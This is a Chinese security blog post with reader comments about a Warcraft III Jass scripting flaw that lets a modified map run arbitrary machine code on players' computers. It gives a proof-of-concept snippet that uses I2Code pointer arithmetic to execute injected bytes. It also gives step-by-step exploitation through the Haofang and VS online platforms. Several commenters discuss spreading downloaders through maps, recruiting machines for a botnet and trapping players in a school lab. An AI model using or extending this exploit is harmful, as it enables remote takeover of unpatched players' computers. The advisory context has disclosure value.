各大游戏高危漏洞(魔兽争霸、反恐精英)

# 鬼仔:这个洞貌似很早以前就出了,暴雪也已经出了补丁,但是
ring04h:暴雪在1.24上,做出了修复工作,但是国内的完全全部都徘徊在1.20版,谁都不会去更新。 对于国内玩家,这个漏洞利用率能够稳定在90%上。

作者:ring04h

War3 Jass虚拟机经测试,存在严重漏洞!允许运行时动态创建并执行任意机器码
Jass属于War3为地图开发者提供的一套脚本语言,方便开发者开发或建立修改属于自己的地图。
经过推断,CS (cstrike)可能也存在此类问题。

利用方式:登陆浩方或者VS对战平台,修改某张地图(例如DOTA的地图),开启游戏,等待其他玩家进入,开始游戏,即可执行任意机器码,控制玩家计算机。

Jass语言的用处
Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用.

POC:

set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.

local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )

call TriggerAddAction(t, C)
call TriggerExecute(t)

//It will run whatever bytecode 90 90 90 90 means

function main takes nothing returns nothing
set t = CreateTrigger()
call TriggerAddAction(t, i2code(0x00929217) )
a[0]=0x45623512
a[1]=0x34562323
a[2]=0x62329301

//other thousand lines of this

b[0]=0x12312333
endfunction

上图:

War3_Jass
文章标题加上了by ring04h,是说明ring04h将对以上的言论负责,其它稍后再编辑详情,上POC!

相关日志

楼被抢了 18 层了... 抢座Rss 2.0或者 Trackback

  • 漠惘

    感觉影响不会比微软的漏洞小

  • Zafe

    这个问题的确比较严重,1.20的玩家没谁愿意更新,因为网上大部分玩家都是1.20的,网吧也一样。如果能作张有下载者的地图发到网上,那就。。。。

  • Ash

    速度更新去了

  • YoCo Smart

    图挂了。。。

  • HJin.me

    最好再出一个互通图的修改教程~~

  • MOPVHS

    正好~~~那群牲口喜欢在玩这个的时候大声喧哗,回头上学校机房开个问题地图钓XX去~我.守.啊.株.啊.待.啊.兔.啊…

  • naughtycat

    但自己修改的图 别人进主需要读图的话 大家现在一般都不会玩的
    尤其是DotA一类的 另外比较经典的地图修改版的 没有暴雪认证标志 大家也会注意是作弊地图的
    不过 真是下载开了游戏的话 的确很危险 :)

  • HOHO

    这个漏洞算严重了,上浩方就可以无限量抓鸡啦~

  • noevil

    看的心里好痒…

  • amxku

    。。。。。。。。。。。。。。。。。。。。
    test

  • ttttest77

    http://www.wc3c.net/showthread.php?t=105677
    我google到了这个帖子,但发在ring04h牛的博客上莫名遭删帖了

  • xxxxxxxx

    利用网游传播的病毒,是将来的主流方向

  • Tik

    地图是要更新的,在最新刚出来的地图上做手脚就行了….麻痹了,这下完了…

  • 周大侠

    传说中的POC
    太阳呀 !!!!

  • xiaodao

    这个不是老新闻了么,都出来几个月了,而且你附的这张图也不是ring04截的

    http://www.cnbeta.com/articles/82950.htm

  • L

    魔兽中的Jass,以后将是主流传播的一种了.

发表评论